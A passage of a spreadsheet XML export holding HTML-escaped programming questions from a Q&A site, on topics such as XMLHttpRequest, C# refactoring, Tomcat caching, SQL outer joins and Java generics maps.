&lt;p&gt;&lt;strong&gt;EDIT&lt;/strong&gt; The solution needs to be database independent, and it would be useful to be able to specify an conflict resolution policy per value object. (eg. A user object might try and merge if the updated rows weren't changed, but a transaction object would always require user intervention).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best method of Instantiating an XMLHttpRequest object</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is the best method for creating an &lt;a href="http://en.wikipedia.org/wiki/XMLHttpRequest"&gt;XMLHttpRequest&lt;/a&gt; object?&lt;/p&gt;
&lt;p&gt;It should work in all capable browsers.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ExtJS: AJAX Links in Grid in Tab in Window</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am working on my first project using ExtJS.&lt;/p&gt;
&lt;p&gt;I have a Data Grid sitting inside a Tab that is inside a Window.&lt;/p&gt;
&lt;p&gt;I want to add a link or button to the each element of the grid (I am using extended elements at the moment with HTML content through the RowExpander) that will make an AJAX call and open another tab.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Generate XML documentation for private members</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a way to generate XML documentation for private members? Be default it only generates it for public members, which is correct for published code but not for code only used within a company.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>.NET Class Refactoring Dilemma</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;So I'm refactoring a legacy codebase I've inherited, and in the process I found a static class that encapsulates the logic for launching 3rd party applications. It essentially looks like this (shortened for brevity to only show one application):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;using System.IO;
using System.Configuration;
public static class ExternalApplications
{
   public string App1Path
   {
      get
      {
         if(null == thisApp1Path)
            thisApp1Path = Configuration.AppSettings.Get("App1Path");
         return thisApp1Path;
      }
   }
   private string thisApp1Path = null;
   public bool App1Exists() 
   {
      if(string.IsNullOrEmpty(App1Path))
         throw new ConfigurationException("App1Path not specified.");
      return File.Exists(App1Path);
   }
   public void ExecuteApp1(string args) 
   {
       // Code to launch the application.
   }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It's a nice attempt to separate the external applications from the rest of the code, but it occurs to me that this could have been refactored further. What I have in mind is something like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;using System.IO;
public abstract class ExternalApplicationBase
{
   protected ExternalApplicationBase()
   {
      InitializeFromConfiguration();
   }
   public string Path { get; protected set; }
   public bool Exists() 
   {
      if(string.IsNullOrEmpty(this.Path))
         throw new ConfigurationException("Path not specified.");
      return File.Exists(this.Path);
   }
   public virtual void Execute(string args)
   {
      // Implementation to launch the application
   } 
   protected abstract InitializeFromConfiguration();
}
public class App1 : ExternalApplicationBase
{
   protected virtual void InitializeFromConfiguration()
   {
      // Implementation to initialize this application from
      // the application's configuration file.
   }
 }
 public class App2 : ExternalApplicationBase
 {
   protected virtual void InitializeFromConfiguration()
   {
      // Implementation to initialize this application from
      // the application's configuration file.
   }
 }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;My concerns are as follows:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;p&gt;A class, interface, or other construct may already exist that does this, and I just haven't stumbled across it.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;It may be overkill for what I want to do. Note, however, that the application uses at least three separate 3rd party applications that I have identified so far (and more are almost certain to pop up). &lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;I'm not entirely comfortable with the name of the base class. It seems fuzzy, and not very informative (but I couldn't think of much better, given that Application is already well defined, reserved by the Framework, and would create a gross level of confusion were I to use it).&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;The idea is that I want to be able to keep the application configuration data (it's path and executable name) in the App.Config file, and check for its existence when my application starts up; when my software needs to launch the software, I want to do it through a single method call, and not have the code building command lines and trying to launch the software manually (as it currently does).&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;So I'm sending out a request for help, guidance, and suggestions. Anything you can profer is greatly appreciated.&lt;/p&gt;
&lt;p&gt;P.S. I'm asking this here because I work, as I frequently do, as a sole developer at my firm; I don't have anyone else to bounce these ideas off of. You guys have tons of experience with this stuff, and it would be foolish of me not to ask for your advice, so I hope you'll all bear with me. Thanks in advance!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you find out what users really want?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've read somewhere (I forget the source, sorry - I think the MS Office developer's blog?), that when you do a survey of users asking them about what features they would like to see in your software/website, they will more often than not say that they want every little thing, whereas collected metrics show that in the end, most people don't use 99% of these features. The general message from the blog post was that you shouldn't ask people what they use, you should track it for yourself.&lt;/p&gt;
&lt;p&gt;This leads to an unfortunate chicken-and-egg situation when trying to figure out what new feature to add next. Without the feature already in place, I can't measure how much it's actually being used. With finite (and severely stretched) resources, I also can't afford to add all the features and then remove the unused ones.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;How do you find out what will be useful to your users?&lt;/strong&gt; If a survey is the only option, do you have to structure your questions in certain ways (eg: don't show a list of possible features, since that would be leading them on)?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Flash security: problem loading Flash 8 AS2 modules into Flash 6 AS1 module</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an old program written in Actionscript 1, compiled in Flash 6. It loads 10 other modules, of which 3 are written in Actionscript 2, compiled in Flash 8. The original program is embedded into an html and works perfectly when the html file is run on a webserver. But if I just drag the html file to my browser, the 3 AS2 modules will not load. Or, more accurately, they do load but I can't access their functions.
All the modules are compiled with "local playback security=access local files only".
I am using Flash CS3 to compile all the modules.
Without rewriting the main loading module to AS2, is there anything I can do to solve this?
Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I make Tomcat stop caching my servlet responses?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm learning Servlets programming, using Apache Tomcat 6 on a Ubuntu 8.10 machine, and I'm running with a very annoying issue -- apparently, related to caching.&lt;/p&gt;
&lt;p&gt;This is what I'm doing: I write a servlet, put it in a nice directory structure and deploy it using the Tomcat Web Application Manager. It works as expected. Then I edit the servlet, recompile and try to access it again, but Tomcat keeps returning the same old version. Reloading the Application or even restarting the server does not work. The only thing that works is "Undeploying" the Application, then deploying it all over again. &lt;/p&gt;
&lt;p&gt;I have to do this every single time I make any small change on my code. It sucks.&lt;/p&gt;
&lt;p&gt;I'm sure there is a way around this, but I couldn't find the answer anywhere on the web (and I did search a lot). I would really appreciate any help. Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>prototype and jQuery peaceful co-existence?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I know very little about JavaScript but despite this I'm trying to cobble something together on my wordpress blog. It's not working, and I don't know how to resolve it, and hey, that's what StackOverflow is for, right?&lt;/p&gt;
&lt;p&gt;Firstly, the error message is:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Error: element.dispatchEvent is not a function
Source File: http://.../wp-includes/js/prototype.js?ver=1.6
Line: 3936
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It happens on page load. My page load handler is registered thusly:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Event.observe(window, 'load', show_dates_as_local_time);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The error goes away if I disable some other plugins, and this (plus googling) led me to conclude that it was a conflict between prototype and jQuery (which is used by some of the other plugins).&lt;/p&gt;
&lt;p&gt;Secondly I'm following the wordpress recommended practice of using &lt;a href="http://codex.wordpress.org/Function_Reference/wp_enqueue_script" rel="nofollow"&gt;&lt;code&gt;wp_enqeue_script&lt;/code&gt;&lt;/a&gt; to add a dependency from my JavaScript to the Prototype library, as follows:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;add_action( 'wp_print_scripts', 'depo_theme_add_javascript' );
function depo_theme_add_javascript() {
    wp_enqueue_script('friendly_dates', 'javascript/friendly_dates.js', array('prototype'));
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Now I'm also aware that there are some potential conflicts between jQuery and Prototype which are resolved using the jQuery &lt;code&gt;noConflicts&lt;/code&gt; method. I've tried calling that from various places but no good. I don't &lt;em&gt;think&lt;/em&gt; this is the problem because a) the &lt;code&gt;noConflict&lt;/code&gt; function relates solely to the &lt;code&gt;$&lt;/code&gt; variable, which doesn't seem to be the problem here, and b) I would &lt;em&gt;expect&lt;/em&gt; wordpress to sort it out for me because it can...&lt;/p&gt;
&lt;p&gt;Lastly, using the Venkman debugger I've determined that the &lt;code&gt;element&lt;/code&gt; referenced in the error message is indeed an &lt;code&gt;HTMLDocument&lt;/code&gt; but also does lack a &lt;code&gt;dispatchEvent&lt;/code&gt;. Not sure how this could happen, given it's a standard DOM method?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Regex Named Groups in Java</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;It is my understanding that the &lt;code&gt;java.regex&lt;/code&gt; package does not have support for named groups (&lt;a href="http://www.regular-expressions.info/named.html"&gt;http://www.regular-expressions.info/named.html&lt;/a&gt;) so can anyone point me towards a third-party library that does?&lt;/p&gt;
&lt;p&gt;I've looked at &lt;a href="http://jregex.sourceforge.net/"&gt;jregex&lt;/a&gt; but its last release was in 2002 and it didn't work for me (admittedly I only tried briefly) under java5.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Redirect console output to textbox in separate program</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm developing an Windows Forms application that requires me to call a separate program to perform a task.  The program is a console application and I need to redirect standard output from the console to a TextBox in my program.  &lt;/p&gt;
&lt;p&gt;I have no problem executing the program from my application, but I don't know how to redirect the output to my application.  I need to capture output while the program is running using events.  &lt;/p&gt;
&lt;p&gt;The console program isn't meant to stop running until my application stops and the text changes constantly at random intervals.  What I'm attempting to do is simply hook output from the console to trigger an event handler which can then be used to update the TextBox.&lt;/p&gt;
&lt;p&gt;I am using C# to code the program and using the .NET framework for development.  The original application is not a .NET program.&lt;/p&gt;
&lt;p&gt;EDIT:
Here's example code of what I'm trying to do.  In my final app, I'll replace Console.WriteLine with code to update the TextBox.  I tried to set a breakpoint in my event handler, and it isn't even reached.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    void Method()
    {
        var p = new Process();
        var path = @"C:\ConsoleApp.exe";
        p.StartInfo.FileName = path;
        p.StartInfo.UseShellExecute = false;
        p.OutputDataReceived += p_OutputDataReceived;
        p.Start();
    }
    static void p_OutputDataReceived(object sender, DataReceivedEventArgs e)
    {
        Console.WriteLine("&amp;gt;&amp;gt;&amp;gt; {0}", e.Data);
    }
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>FxCop rule that checks for NotImplementedExceptions</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'd like to have the nightly build check for how many NotImplementedExeptions there are in my .NET code so hopefully we can remove them all before releasing.  My first thought is that FxCop might be a good tool to do this.  Does anyone have a custom FxCop rule for this?  How would I go about creating one myself?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>DataContext naming Best Practices</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Are there any? Do you give the DataContext the name of the Database you are getting data from or..&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Stubbing functions in simulations</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm working on an embedded C project that depends on some external HW. I wish to stub out the code accessing these parts, so I can simulate the system without using any HW. Until now I have used some macros but this forces me to change a little on my production code, which I would like to avoid.&lt;/p&gt;
&lt;h2&gt;Example:&lt;/h2&gt;
&lt;pre&gt;&lt;code&gt;stub.h
#ifdef _STUB_HW
#define STUB_HW(name) Stub_##name
#else /*_STUB_HW*/
#define STUB_HW(name) name
#endif /*_STUB_HW*/
my_hw.c
WORD STUB_HW(clear_RX_TX)()
{ /* clear my rx/tx buffer on target HW */ }
test_my_hw.c
#ifdef _STUB_HW
WORD clear_RX_TX()
{ /* simulate clear rx/tx buffer on target HW */ }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;With this code I can turn on/off the stubbing with the preprocessor tag &lt;code&gt;_STUB_HW&lt;/code&gt; &lt;br&gt;&lt;br&gt;
Is there a way to acomplish this without having to change my prod code, and avoiding a lot of ifdefs. And I won't mix prod and test code in the same file if I can avoid it. I don't care how the test code looks as long as I can keep as much as possible out of the production code.&lt;/p&gt;
&lt;h2&gt;Edit:&lt;/h2&gt;
&lt;p&gt;Would be nice if it was posible to select/rename functions without replacing the whole file. Like take all functions starting on &lt;code&gt;nRF_##&lt;/code&gt; and giving then a new name and then inserting &lt;code&gt;test_nRF_##&lt;/code&gt; to &lt;code&gt;nRF_##&lt;/code&gt; if it is posible &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Emacs and slime stopped cooperating for me</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to use slime from CVS (2009-01-05) but keep getting this error:&lt;/p&gt;
&lt;pre&gt;
       LOAD: A file with name
      /usr/share/common-lisp/source/slime/swank-loader.lisp does not exist
&lt;/pre&gt;
&lt;p&gt;I've stripped my .emacs down to just:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;(setq inferior-lisp-program "/usr/bin/clisp")
(add-to-list 'load-path "/home/ssm/lisp/slime/")
(require 'slime)
(slime-setup)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I've deleted my ~/.slime directory, started with 'emacs -q' and eval'd the above code but  I keep getting the LOAD  error when I run slime (via M-x slime).  Any ideas on how to fix this error?&lt;/p&gt;
&lt;p&gt;FWIW, I've tried to install slime via apt-get but I keep getting errors there too about cl-swank being broken.  That's a whole different story.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SQL code import into Access 2007</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I basically need to know how to import SQL code into Access. I've tried one way but that requires me to do one table and one value at a time which takes a lot of time.&lt;/p&gt;
&lt;p&gt;Can anyone help?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Modularising a C# Compact Framework 2.0 Application</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We're currently developing a new piece of hand-held software. I cant discuss the nature of the application, so I'll use an example instead.&lt;/p&gt;
&lt;p&gt;We're designing hand-held software for managing a school. We want to modularise each aspect of the system so that different schools can use different features. &lt;/p&gt;
&lt;p&gt;Our system will start with a main menu and a login screen. I'd like this to be the base of the system and be where the modules will be added to. I.e. I'll have a project called SchoolPda.&lt;/p&gt;
&lt;p&gt;I then want to have different modules. I.e., I want a registration module that will handle student registrations. I want a classroom module for managing classroom cleanliness, etc.&lt;/p&gt;
&lt;p&gt;The way I'd possibly see this working is including/not including different dlls and having the base system's main menu expose buttons to access those modules if the dlls exist. That's just the kind of thing we're after.&lt;/p&gt;
&lt;p&gt;Does anyone have any experience doing something like this? What would be the best way of doing it? We don't need to worry about the database as the database will always be the full database, but aspects wont get populated if the associated modules do not exist.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>AVM2 and ABC (Adobe's ActionScript bytecode format) spec licensing.. can I use it?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Google is failing me on this one.&lt;/p&gt;
&lt;p&gt;Let's say I have some ECMA script that I've compiled to an ABC bytecode file using the compiler in the Open Source Flex SDK.&lt;/p&gt;
&lt;p&gt;Is it within the terms of use (That I can't seem to find) for me to use the AVM2 specification from adobe to create a new interpreter for this file?&lt;/p&gt;
&lt;p&gt;The best I can manage is a sentence in wikipedia that says that the flash specification is available "without restriction". I'm not making a flash player though, and AFAIK the AVM2 spec is separate from the SWF spec.&lt;/p&gt;
&lt;p&gt;Does anyone know off-hand if my intentions are legal?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Adding a License to your .Net Web Application</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am currently looking at adding some licensy type software which will protect my .net web application source code. Was wondering if you guys had any experience with this and knew perhaps any companies or sources which provide such utilities ?&lt;/p&gt;
&lt;p&gt;So my main aim is to protect the actual files&lt;/p&gt;
&lt;p&gt;i.e Default.aspx
Default.aspx.cs
....
being copied in the future without me being able to stop them from using it.&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
&lt;p&gt;EDIT : From reading the replies i seem to think obfuscator seems to be the way to go.
Does a obfuscator program only work on exe or dll's or does it also work on individual pages ?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>TFS shows some pending changes under my name, but I have not changed anything</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;TFS shows some pending changes under my name, but I have not changed anything. When I check in and see View Pending changes, I see some of the changes which I have never made, changes pending under some other user might be shown as my pending changes. When I unselect and check-in my changes, these are still locked under my name? Is this due to auto-checkout or any other reason? (TFS policy requires a compile before check-in)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the best way to track memory management while testing my iPhone App?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;While developing my app I have come to realize that the majority of my app crashes have arisen from poor memory management.&lt;/p&gt;
&lt;p&gt;I understand I can print or log retain counts through NSLog (@"retain count is:%d",[myInstance retainCount]);&lt;/p&gt;
&lt;p&gt;But isn't there a better, less manual method? Possibly a visual representation of your objects and instances?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;answered. Cheers, Adam &amp;amp; Jason. :-)&lt;/strong&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Get image properties with Jython</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am using Jython to move images around and organise them.  I would like to extract some information from the images like dimensions and file size.&lt;/p&gt;
&lt;p&gt;How would I go about doing this with Jython?&lt;/p&gt;
&lt;p&gt;Cheers&lt;/p&gt;
</t>
  </si>
  <si>
    <t>JavaScript detection of keypress context (form history selection vs. form submit)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm writing a semi-generic form plugin using jQuery in order to speed up the development of the project I'm working on.&lt;/p&gt;
&lt;p&gt;The plan is that a &lt;a href="http://jtemplates.tpython.com/" rel="nofollow"&gt;jTemplates&lt;/a&gt; template contains the fields, my plugin looks through the template to find any required multi-lingual resources, requests them from the server, and then packages everything up into a JavaScript object that is then passed to a custom function on "submit".&lt;/p&gt;
&lt;p&gt;Everything is working nicely, except the standard "when enter is pressed, submit the form" code that you need to do when you're faking a form:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;opts.coreElement.find('input[type=text]').keypress(function(evt) {
    if ((evt.keyCode || evt.which) == 13) {
        opts.coreElement.find('.saveButton').click();
    }
});
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The issue is that in Firefox (at least; I haven't checked other browsers yet), if you've entered information in a similarly-named textbox before, you get your form history.  If you then select one of those suggested values by hitting enter, it submits the form.  Not great if you're on the first input on the page.  Really rather annoying, actually.&lt;/p&gt;
&lt;p&gt;The obvious solution seems to be to insert a form element around the fields and stopping any possible submission of this dummy form via jQuery.  Fortunately I have the luxury of doing this as I'm in ASP.NET MVC, but what if I wasn't?  What if my plugin didn't know whether it was already inside a form and so had to keep itself to itself?  What if I was in standard WebForms ASP.NET and I &lt;em&gt;had&lt;/em&gt; to manually "target" each input's return key to the correct submit button?&lt;/p&gt;
&lt;p&gt;Is there a way, perhaps through the event object itself, to detect the context of the keypress, so I can filter out the selection of form history items?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I deny access to .dll files in a web site (on both IIS 6 and 7)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;If I use an URL like &lt;a href="http://mysite/myfolder/myfile.dll" rel="nofollow"&gt;http://mysite/myfolder/myfile.dll&lt;/a&gt;, I get a dialog "Do you want to open or save this file".  Of course, I don't want people to be able to download and disassembly our dll's.  How can I deny people accessing such files directly ?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Using API/Function calls or going for the Cron Job approach - An inquiry into dealing with transactions - How would you handle it?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I wanted to run something by you guys. I am starting a new project which is roughly the following:&lt;/p&gt;
&lt;p&gt;Important information: I am using PHP and MySQL&lt;/p&gt;
&lt;p&gt;Every minute I get a list of to-do transactions from an API from different users. &lt;/p&gt;
&lt;p&gt;Example: &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;user1 send $1 to user2
userx send $2 to usera
userw send $0.50 to user2
etc..
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Lets say user1 wants to send $1 to user2. There are two posibilities, it's succesful or it's unsuccessful because there are insufficient funds or the user spelled the username wrong. If it's unsuccesfull I send out a message to the user.&lt;/p&gt;
&lt;p&gt;I am now facing several options - please bare with me through my thought process.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Option 1&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Create a database table with transactions that need to be processed and use a cronjob that processes them every minute. The risk here is that the script could run against an error or a timeout and the other transactions would still show In Progress in the database table. So I would need a second script to check that against a timestamp.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Option 2&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Create an API or Function which gets called for each transaction after I receive them and brings me a response. From which then I can call another API or Function to deal with that response or move on to the next transaction. However I would still have to put them in a database table since I can't risk losing them if the script stops executing. So it would work as follow: put all transactions in database table - start transaction - when finished transaction delete from table - start transaction 2.&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Both options are flawed because you don't know how long the list of transactions will be. If it's long PHP is definitely not optimal to run for a long time - using set timeout to zero is risky. I am looking to create a solution that will scale with PHP. So I was thinking about an Option 3.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Option 3 (Optimal solution?)&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Use an API to return 10 transactions. &lt;/p&gt;
&lt;p&gt;In database set a flag to say they are sent to a script and timestamp to say when they were sent&lt;/p&gt;
&lt;p&gt;PHP script retreives 10 transactions from API - handles 10 transactions.&lt;/p&gt;
&lt;p&gt;Once transaction completed - delete it from this table and copy it to completed transaction table.&lt;/p&gt;
&lt;p&gt;Have a cronjob script check every 3 minutes if timesent is greater then X minutes (based on an upper bound of the execution time of 10 transactions). If it is greater - set them to not sent - so they can be sent out again.&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;As you can see I wrote down my whole thought process on this and am looking for input. There's bound to be stuff that I missed. Also please realize that these are not real financial transactions - it's just the best metafore I could use to make it clear.&lt;/p&gt;
&lt;p&gt;Thank you very much,&lt;/p&gt;
&lt;p&gt;Ice&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Fetch mail attachment into SQL Server 2005 using IMAP</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to import data into my SQL Server 2005 from an e-mail datasource on an Exchange mail server. It means that when a mail is sent to a particular mail address I must retrieve the mail subject and the attached file and then I must import these data into my SQL Server 2005, using IMAP.&lt;/p&gt;
&lt;p&gt;Can I do this with SSIS, or do I have to write a Windows Service in C# ?&lt;/p&gt;
&lt;p&gt;Do I need to use an IMAP API library of some kind ?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>String Comparison : individual comparison Vs appended string comparison</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have six string variables say str11, str12, str13, str21, str21 and str23.&lt;/p&gt;
&lt;p&gt;I need to compare combination of these variables.&lt;/p&gt;
&lt;p&gt;The combinations I have to check is str11 -- str12 -- str13 as one group and str21 -- str22 -- str23 as other group. I have to compare these two groups.&lt;/p&gt;
&lt;p&gt;Now I'm in confusion which method should I use for comparison?&lt;/p&gt;
&lt;p&gt;Can I append strings of same group and compare, which is only one comparison
   say &lt;code&gt;( str11 append str12 append str13 )  eqauls ( str21 append str22 append str23 )&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;Or&lt;/p&gt;
&lt;p&gt;Should I go for individual 3 comparisons?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;if( str11 equals str21 ) {
	if( str12 equals str22 ) {
		if( str13 equals str23 ) {
        }
	}
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;What is performance factor which costs me because of string length when I do string comparison?
Lets us assume all strings are of same( approx ) length.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Java map with values limited by key's type parameter</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a way in Java to have a map where the type parameter of a value is tied to the type parameter of a key? What I want to write is something like the following:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public class Foo {
    // This declaration won't compile - what should it be?
    private static Map&amp;lt;Class&amp;lt;T&amp;gt;, T&amp;gt; defaultValues;
    // These two methods are just fine
    public static &amp;lt;T&amp;gt; void setDefaultValue(Class&amp;lt;T&amp;gt; clazz, T value) {
        defaultValues.put(clazz, value);
    }
    public static &amp;lt;T&amp;gt; T getDefaultValue(Class&amp;lt;T&amp;gt; clazz) {
        return defaultValues.get(clazz);
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;That is, I can store any default value against a Class object, provided the value's type matches that of the Class object. I don't see why this shouldn't be allowed since I can ensure when setting/getting values that the types are correct.&lt;/p&gt;
&lt;p&gt;EDIT: Thanks to cletus for his answer. I don't actually need the type parameters on the map itself since I can ensure consistency in the methods which get/set values, even if it means using some slightly ugly casts.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>On Windows XP, how do I enumerate all the windows displayed by the system (C#)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to end up with a list (or array or whatever) of all the visible (including minimised) windows.  &lt;/p&gt;
&lt;p&gt;I have found 2 similar questions, which don't &lt;em&gt;quite&lt;/em&gt; give me what I'm looking for:&lt;br /&gt;
- &lt;a href="http://stackoverflow.com/questions/210504/enumerate-windows-like-alt-tab-does"&gt;Work out which windows go in the alt-tab list&lt;/a&gt;&lt;br /&gt;
- &lt;a href="http://stackoverflow.com/questions/308135/how-can-i-enumerate-the-open-windows-enumwindows-of-another-user-session"&gt;list windows in another user's session&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Thanks.  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Problem with SQL Join</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have two tables, tblEntities and tblScheduling.&lt;/p&gt;
&lt;p&gt;tblEntities:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;EntityID  ShortName          Active
1         Dirtville          1
2         Goldtown           1
3         Blackston          0
4         Cornfelt           1
5         Vick               1
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;tblScheduling:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;ScheduleID EntityID SchedulingYearID
1          1        20
2          1        21
3          2        20
4          3        19
5          5        20
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I need a query that will show &lt;strong&gt;ALL ACTIVE&lt;/strong&gt; Entities and their schedule information for a particular ScheduleYearID.&lt;/p&gt;
&lt;p&gt;Output should look like (the desired SchedulingYearID in this case is 20):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;EntityID ScheduleID
1        1
2        3
4        NULL
5        5
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The query that I have written so far is: &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT     tblEntities.EntityID, tblEntities.ShortName, tblScheduling.ScheduleID
FROM         tblScheduling RIGHT OUTER JOIN
                      tblEntities ON tblScheduling.EntityID = tblEntities.EntityID
WHERE     (tblScheduling.SchedulingYearID = @SchedulingYearID) 
AND (tblEntities.Active = 1)
ORDER BY tblEntities.EntityID
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;My problem is that using this query it will not include active entities without schedule information (such as EntityID 4 in the example above). I can write the query to display all active entities and their schedule status fine, but once I start limiting it via the SchedulingYearID I lose those particular entities. &lt;/p&gt;
&lt;p&gt;Are there any solutions that I am obviously missing without having to resort to subqueries, cursors, etc.? If not it's not a big deal, I just feel like I am missing something simple here.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to organize the controller of a MVC-based program with multiple screens/panels?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm currently working on a hobby project, written in Java, containing about two different JFrames with about 3-4 JPanels each. The problem I'm facing is that I'm not so sure how to handle the interaction with my controller and different view classes.&lt;/p&gt;
&lt;p&gt;For instance, I've an article by Sun on &lt;a href="http://java.sun.com/developer/technicalArticles/javase/mvc/" rel="nofollow"&gt;Java App. design with MVC&lt;/a&gt;, where they list the option to let all the communications between model and view go through the controller as the most modern one, a tactic I've been taught as well and should do just fine. However, it doesn't quite go as deep as to explain how to handle all the ActionListeners involved for all the elements and different panels. &lt;/p&gt;
&lt;p&gt;The 'way to go' I've been taught so far is to either use one controller and set the ActionListener to the various objects through getters and keep track of the active panel. The alternative my awesome Java book gives is to just stick to inner classes for each view class. Either method seems to result in pretty nasty code, while I'd prefer one or several controllers with as little bloat as possible.&lt;/p&gt;
&lt;p&gt;My question of course is; how would you assign the ActionListeners as neatly and efficiently as possible while keeping the controller(s) usable?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Getting a Signature Mismatch Error when Compiling Even though it Matches in VS.NET 2005</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I changed a reference in my project from pointing to a specific hard-coded DLL to a project reference and now I'm getting an error telling me that the signature for some event handlers don't match even though they do.&lt;/p&gt;
&lt;p&gt;Here's one exact message:&lt;/p&gt;
